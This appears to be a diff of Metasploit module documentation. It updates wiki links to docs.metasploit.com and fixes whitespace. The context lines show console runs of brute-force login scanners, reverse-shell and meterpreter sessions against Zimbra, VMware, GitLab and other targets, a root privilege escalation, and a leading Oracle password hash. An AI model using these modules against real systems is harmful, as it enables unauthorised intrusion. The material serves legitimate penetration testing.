127.0.0.1 127.0.0.1 1522/tcp (oracle) SCOTT S:BF6D4E3791075A348BA76EF533E38F7211513CCE2A3513EE3E3D4A5A4DE0;H:3814C74599475EB73043A1211742EE59;T:0911BAC55EEF63F0C1769E816355BE29492C9D01980DC36C95A86C9CE47F93790631DE3D9A60C90451CFF152E25D9E94F612A1493EC82AF8E3C4D0432B06BA4C2C693B932332BC14D2D66CEF098A4699 Nonreplayable hash oracle12c
```

2
documentation/modules/auxiliary/scanner/oracle/oracle_login.md
View File

@ -17,7 +17,7 @@ apt-get install nmap
```
In addition, if you encounter errors due to OCI libraries not being found, please see the
[How to get Oracle Support working with Kali Linux](https://github.com/rapid7/metasploit-framework/wiki/How-to-get-Oracle-Support-working-with-Kali-Linux).
[How to get Oracle Support working with Kali Linux](https://docs.metasploit.com/docs/using-metasploit/other/oracle-support/how-to-get-oracle-support-working-with-kali-linux.html).
For Oracle Server, please follow the following
[guide](https://tutorialforlinux.com/2019/09/17/how-to-install-oracle-12c-r2-database-on-ubuntu-18-04-bionic-64-bit-easy-guide/).

14
documentation/modules/auxiliary/scanner/rservices/rexec_login.md
View File

@ -22,19 +22,19 @@ The following was done on Kali linux:
A run against the configuration from these docs
```
msf > use auxiliary/scanner/rservices/rexec_login
msf > use auxiliary/scanner/rservices/rexec_login
msf auxiliary(rexec_login) > set username test
username => test
msf auxiliary(rexec_login) > set password 'test'
password => test
msf auxiliary(rexec_login) > run
[*] 127.0.0.1:512 - 127.0.0.1:512 - Starting rexec sweep
[+] 127.0.0.1:512 - 127.0.0.1:512, rexec 'test' : 'test'
[!] 127.0.0.1:512 - *** auxiliary/scanner/rservices/rexec_login is still calling the deprecated report_auth_info method! This needs to be updated!
[!] 127.0.0.1:512 - *** For detailed information about LoginScanners and the Credentials objects see:
[!] 127.0.0.1:512 - https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] 127.0.0.1:512 - https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] 127.0.0.1:512 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html
[!] 127.0.0.1:512 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html
[!] 127.0.0.1:512 - *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] 127.0.0.1:512 - https://github.com/rapid7/metasploit-framework/pull/5376
[!] 127.0.0.1:512 - https://github.com/rapid7/metasploit-framework/pull/5377
@ -49,14 +49,14 @@ Utilizing [rexec-brute](https://nmap.org/nsedoc/scripts/rexec-brute.html)
```
nmap -p 512 --script rexec-brute 127.0.0.1
Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-27 21:23 EDT
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000037s latency).
PORT STATE SERVICE
512/tcp open exec
| rexec-brute:
| Accounts:
| rexec-brute:
| Accounts:
| test:test - Valid credentials
|_ Statistics: Performed 7085940 guesses in 629 seconds, average tps: 9231.6
```

14
documentation/modules/auxiliary/scanner/rservices/rlogin_login.md
View File

@ -22,7 +22,7 @@ The following was done on Kali linux:
A run against the configuration from these docs
```
msf > use auxiliary/scanner/rservices/rlogin_login
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary(rlogin_login) > set rhosts 10.1.2.3
rhosts => 10.1.2.3
msf auxiliary(rlogin_login) > set password test
@ -30,7 +30,7 @@ The following was done on Kali linux:
msf auxiliary(rlogin_login) > set username test
username => test
msf auxiliary(rlogin_login) > run
[*] 10.1.2.3:513 - 10.1.2.3:513 - Starting rlogin sweep
[*] 10.1.2.3:513 - 10.1.2.3:513 - Attempting: 'test':"test" from 'root'
[*] 10.1.2.3:513 - 10.1.2.3:513 - Prompt: Password:
@ -38,8 +38,8 @@ The following was done on Kali linux:
[+] 10.1.2.3:513 - 10.1.2.3:513, rlogin 'test' successful with password "test"
[!] 10.1.2.3:513 - *** auxiliary/scanner/rservices/rlogin_login is still calling the deprecated report_auth_info method! This needs to be updated!
[!] 10.1.2.3:513 - *** For detailed information about LoginScanners and the Credentials objects see:
[!] 10.1.2.3:513 - https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] 10.1.2.3:513 - https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] 10.1.2.3:513 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html
[!] 10.1.2.3:513 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html
[!] 10.1.2.3:513 - *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] 10.1.2.3:513 - https://github.com/rapid7/metasploit-framework/pull/5376
[!] 10.1.2.3:513 - https://github.com/rapid7/metasploit-framework/pull/5377
@ -54,15 +54,15 @@ Utilizing [rlogin-brute](https://nmap.org/nsedoc/scripts/rlogin-brute.html)
```
nmap -p 513 --script rlogin-brute 10.1.2.3
Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-11 20:07 EDT
Nmap scan report for test (10.1.2.3)
Host is up (0.000039s latency).
PORT STATE SERVICE
513/tcp open login
| rlogin-brute:
| rlogin-brute:
| Accounts: No valid accounts found
|_ Statistics: Performed 6662201 guesses in 609 seconds, average tps: 10491.0
Nmap done: 1 IP address (1 host up) scanned in 608.75 seconds
```

8
documentation/modules/auxiliary/scanner/rservices/rsh_login.md
View File

@ -30,20 +30,20 @@ The following was done on Kali linux:
A run against the configuration from these docs
```
msf > use auxiliary/scanner/rservices/rsh_login
msf > use auxiliary/scanner/rservices/rsh_login
msf auxiliary(rsh_login) > set rhosts 10.1.2.3
rhosts => 10.1.2.3
msf auxiliary(rsh_login) > set username root
username => root
msf auxiliary(rsh_login) > run
[*] 10.1.2.3:514 - 10.1.2.3:514 - Starting rsh sweep
[*] 10.1.2.3:514 - 10.1.2.3:514 - Attempting rsh with username 'root' from 'root'
[+] 10.1.2.3:514 - 10.1.2.3:514, rsh 'root' from 'root' with no password.
[!] 10.1.2.3:514 - *** auxiliary/scanner/rservices/rsh_login is still calling the deprecated report_auth_info method! This needs to be updated!
[!] 10.1.2.3:514 - *** For detailed information about LoginScanners and the Credentials objects see:
[!] 10.1.2.3:514 - https://github.com/rapid7/metasploit-framework/wiki/Creating-Metasploit-Framework-LoginScanners
[!] 10.1.2.3:514 - https://github.com/rapid7/metasploit-framework/wiki/How-to-write-a-HTTP-LoginScanner-Module
[!] 10.1.2.3:514 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/creating-metasploit-framework-loginscanners.html
[!] 10.1.2.3:514 - https://docs.metasploit.com/docs/development/developing-modules/guides/scanners/how-to-write-a-http-loginscanner-module.html
[!] 10.1.2.3:514 - *** For examples of modules converted to just report credentials without report_auth_info, see:
[!] 10.1.2.3:514 - https://github.com/rapid7/metasploit-framework/pull/5376
[!] 10.1.2.3:514 - https://github.com/rapid7/metasploit-framework/pull/5377

2
documentation/modules/auxiliary/scanner/smb/smb_enumshares.md
View File

@ -16,7 +16,7 @@ On some systems such as Windows 7, it can also iterate over user directories and
```
set RHOSTS [string]
```
This is the target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit for more information.
This is the target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html for more information.
```
set SpiderProfiles [boolean]

8
documentation/modules/auxiliary/scanner/ssl/ssl_version.md
View File

@ -63,7 +63,7 @@ Module options (auxiliary/scanner/ssl/ssl_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 172.217.12.238 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 172.217.12.238 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSLCipher All yes SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RSA-A
ES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES128-GCM-
@ -78,7 +78,7 @@ Module options (auxiliary/scanner/ssl/ssl_version):
SSLVersion All yes SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/ssl/ssl_version) >
msf6 auxiliary(scanner/ssl/ssl_version) >
```
### Expired certificate
@ -120,7 +120,7 @@ Module options (auxiliary/scanner/ssl/ssl_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS expired.badssl.com yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS expired.badssl.com yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSLCipher All yes SSL cipher to test (Accepted: All, TLS_AES_256_GCM_SHA384, TLS_CHACHA20_POLY1305_SHA256, TLS_AES_128_GCM_SHA256, ECDHE-ECDSA-AES256-GCM-SHA384, ECDHE-RS
A-AES256-GCM-SHA384, DHE-RSA-AES256-GCM-SHA384, ECDHE-ECDSA-CHACHA20-POLY1305, ECDHE-RSA-CHACHA20-POLY1305, DHE-RSA-CHACHA20-POLY1305, ECDHE-ECDSA-AES12
@ -135,5 +135,5 @@ Module options (auxiliary/scanner/ssl/ssl_version):
SSLVersion All yes SSL version to test (Accepted: All, SSLv3, TLSv1.0, TLSv1.2, TLSv1.3)
THREADS 1 yes The number of concurrent threads (max one per host)
msf6 auxiliary(scanner/ssl/ssl_version) >
msf6 auxiliary(scanner/ssl/ssl_version) >
```

4
documentation/modules/exploit/linux/http/apache_spark_rce_cve_2022_33891.md
View File

@ -80,7 +80,7 @@ Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.43 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.100.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the vulnerable instance
@ -144,7 +144,7 @@ Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.100.43 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.100.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8080 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the vulnerable instance

6
documentation/modules/exploit/linux/http/axis_app_install.md
View File

@ -64,7 +64,7 @@ Module options (exploit/linux/http/axis_app_install):
---- --------------- -------- -----------
PASSWORD root yes The password to authenticate with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -103,7 +103,7 @@ msf6 exploit(linux/http/axis_app_install) > set LHOST 192.168.1.217
LHOST => 192.168.1.217
msf6 exploit(linux/http/axis_app_install) > run
[*] Started reverse TCP handler on 192.168.1.217:4444
[*] Started reverse TCP handler on 192.168.1.217:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. The target reports itself to be a 'AXIS M3044-V'.
[*] Creating an application package named: jtn
@ -125,7 +125,7 @@ cat /proc/cpuinfo
processor : 0
model name : ARMv7 Processor rev 1 (v7l)
BogoMIPS : 156.00
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
Features : half thumb fastmult vfp edsp neon vfpv3 tls vfpd32
CPU implementer : 0x41
CPU architecture: 7
CPU variant : 0x4

2
documentation/modules/exploit/linux/http/f5_icontrol_rce.md
View File

@ -97,7 +97,7 @@ Module options (exploit/linux/http/f5_icontrol_rce):
HttpPassword yes iControl password
HttpUsername admin yes iControl username
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.133 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.0.0.133 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the iControl installation

4
documentation/modules/exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061.md
View File

@ -49,7 +49,7 @@ Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
resses.
@ -113,7 +113,7 @@ Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
resses.

6
documentation/modules/exploit/linux/http/glpi_htmlawed_php_injection.md
View File

@ -68,7 +68,7 @@ Module options (exploit/linux/http/glpi_htmlawed_php_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.5.132.190 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.5.132.190 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
@ -93,7 +93,7 @@ Exploit target:
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] token = 4578e2880dfc8091a10c38ea60ead228
[*] sid = vitn15j8j9f0lljrfu7daq9es8
@ -125,7 +125,7 @@ msf6 exploit(linux/http/glpi_htmlawed_php_injection) > set payload cmd/unix/pyth
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/glpi_htmlawed_php_injection) > run
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Started reverse TCP handler on 10.5.135.109:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] token = 154f788cf9a685dac8753df78c6c3a1c
[*] sid = 1mcp7n5vq9v6tnqlbm324qk9ce

4
documentation/modules/exploit/linux/http/opentsdb_yrange_cmd_injection.md
View File

@ -43,7 +43,7 @@ Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.1.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.10.1.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4242 yes The target port (TCP)
SRVHOST 10.10.1.30 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0
.0 to listen on all addresses.
@ -96,7 +96,7 @@ Module options (exploit/linux/http/opentsdb_yrange_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.1.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.10.1.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4242 yes The target port (TCP)
SRVHOST 10.10.1.30 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0
.0.0 to listen on all addresses.

2
documentation/modules/exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection.md
View File

@ -35,7 +35,7 @@ Module options (exploit/linux/http/sophos_utm_webadmin_sid_cmd_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 4444 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

4
documentation/modules/exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144.md
View File

@ -51,7 +51,7 @@ Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machi
ne or 0.0.0.0 to listen on all addresses.
@ -111,7 +111,7 @@ Module options (exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machi
ne or 0.0.0.0 to listen on all addresses.

2
documentation/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload.md
View File

@ -36,7 +36,7 @@ Module options (exploit/linux/http/vmware_vcenter_analytics_file_upload):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

2
documentation/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954.md
View File

@ -30,7 +30,7 @@ Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

6
documentation/modules/exploit/linux/http/zimbra_mboximport_cve_2022_27925.md
View File

@ -109,7 +109,7 @@ Module options (exploit/linux/http/zimbra_mboximport_cve_2022_27925):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.166 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.0.0.166 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 7071 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGET_FILENAME no The filename to write in the target directory; should have a .jsp extension (default: <random>.jsp).
@ -134,7 +134,7 @@ Exploit target:
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/nkxj.jsp
[*] Sending POST request with ZIP file
@ -190,7 +190,7 @@ msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > set LHOST 10.0.0.146
LHOST => 10.0.0.146
msf6 exploit(linux/http/zimbra_mboximport_cve_2022_27925) > exploit
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Started reverse TCP handler on 10.0.0.146:4444
[*] Encoding the payload as a .jsp file
[*] Target filename: ../../../../../../../../../../../../opt/zimbra/jetty_base/webapps/zimbra/public/cualvccyq.jsp
[*] Sending POST request with ZIP file

14
documentation/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe.md
View File

@ -39,14 +39,14 @@ In the following scenario, initial access is gained by first exploiting CVE-2022
is elevated to root by exploiting CVE-2022-31660.
```
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > show options
Module options (exploit/linux/http/vmware_workspace_one_access_cve_2022_22954):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.159.98 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 192.168.159.98 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -73,7 +73,7 @@ Exploit target:
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Executing cmd/unix/python/meterpreter/reverse_tcp (Unix Command)
@ -88,15 +88,15 @@ System Language : en_US
Meterpreter : python/linux
meterpreter > getuid
Server username: horizon
meterpreter > background
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
msf6 exploit(linux/http/vmware_workspace_one_access_cve_2022_22954) > use exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > set SESSION -1
SESSION => -1
msf6 exploit(linux/local/vmware_workspace_one_access_certproxy_lpe) > run
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Started reverse TCP handler on 192.168.250.134:4444
[*] Backing up the original file...
[*] Writing '/opt/vmware/certproxy/bin/cert-proxy.sh' (601 bytes) ...
[*] Triggering the payload...
@ -113,5 +113,5 @@ OS : Linux 4.19.217-1.ph3 #1-photon SMP Thu Dec 2 02:29:27 UTC 2021
Architecture : x64
System Language : en_US
Meterpreter : python/linux
meterpreter >
meterpreter >
```

2
documentation/modules/exploit/linux/misc/cisco_rv340_sslvpn.md
View File

@ -35,7 +35,7 @@ Module options (exploit/linux/misc/cisco_rv340_sslvpn):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8443 yes The target port (TCP)
SSL true yes Use SSL
VHOST no HTTP server virtual host

6
documentation/modules/exploit/multi/browser/msfd_rce_browser.md
View File

@ -34,7 +34,7 @@ quiet-flag was sent to the msf daemon. On Linux, it made no difference.
Source code and installers:
* [Source Code Repository](https://github.com/rapid7/metasploit-framework)
* [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)
* [Installers](https://docs.metasploit.com/docs/development/maintainers/downloads-by-version.html)
## Verification Steps
@ -74,11 +74,11 @@ Options unique for this module is described below.
lhost => 192.168.0.17
msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
lport => 443
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
msf5 exploit(multi/browser/msfd_rce_browser) > exploit
[*] Exploit running as background job 0.
[-] Handler failed to bind to 192.168.0.17:443:- -
[*] Started reverse TCP handler on 0.0.0.0:443
[*] Started reverse TCP handler on 0.0.0.0:443
msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
http://0.0.0.0:8080/J5ras6oYftFWW4
[*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4

2
documentation/modules/exploit/multi/http/atlassian_confluence_webwork_ognl_injection.md
View File

@ -29,7 +29,7 @@ Module options (exploit/multi/http/atlassian_confluence_webwork_ognl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 8090 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.

6
documentation/modules/exploit/multi/http/churchinfo_upload_exec.md
View File

@ -107,7 +107,7 @@ Module options (exploit/multi/http/churchinfo_upload_exec):
EMAIL_SUBJ Read this now! yes Email subject in webapp
PASSWORD testing123 yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 127.0.0.1 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 127.0.0.1 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9090 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /churchinfo/ yes The location of the ChurchInfo app
@ -137,7 +137,7 @@ msf6 exploit(multi/http/churchinfo_upload_exec) > set LHOST docker0
LHOST => docker0
msf6 exploit(multi/http/churchinfo_upload_exec) > run
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Target is ChurchInfo!
[+] The target is vulnerable. Target is running ChurchInfo 1.3.0!
@ -160,5 +160,5 @@ meterpreter > sysinfo
Computer : 8eeaa82293b4
OS : Linux 8eeaa82293b4 5.15.0-53-generic #59-Ubuntu SMP Mon Oct 17 18:53:30 UTC 2022 x86_64
Meterpreter : php/linux
meterpreter >
meterpreter >
```

12
documentation/modules/exploit/multi/http/gitlab_exif_rce.md
View File

@ -68,7 +68,7 @@ Module options (exploit/multi/http/gitlab_exif_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.0.0.7 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RHOSTS 10.0.0.7 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
@ -98,7 +98,7 @@ msf6 exploit(multi/http/gitlab_exif_rce) > set LHOST 10.0.0.9
LHOST => 10.0.0.9
msf6 exploit(multi/http/gitlab_exif_rce) > exploit
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/agqzWrd49OBxPkC
[*] Local IP: http://10.0.0.9:8080/agqzWrd49OBxPkC
@ -128,7 +128,7 @@ Similar to above, but using `curl` instead:
```
msf6 exploit(multi/http/gitlab_exif_rce) > run
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Started reverse TCP handler on 10.0.0.9:4444
[*] Executing Linux Dropper for linux/x86/meterpreter_reverse_tcp
[*] Using URL: http://0.0.0.0:8080/Iy9pWshQ8gakRvP
[*] Local IP: http://10.0.0.9:8080/Iy9pWshQ8gakRvP
@ -140,7 +140,7 @@ msf6 exploit(multi/http/gitlab_exif_rce) > run
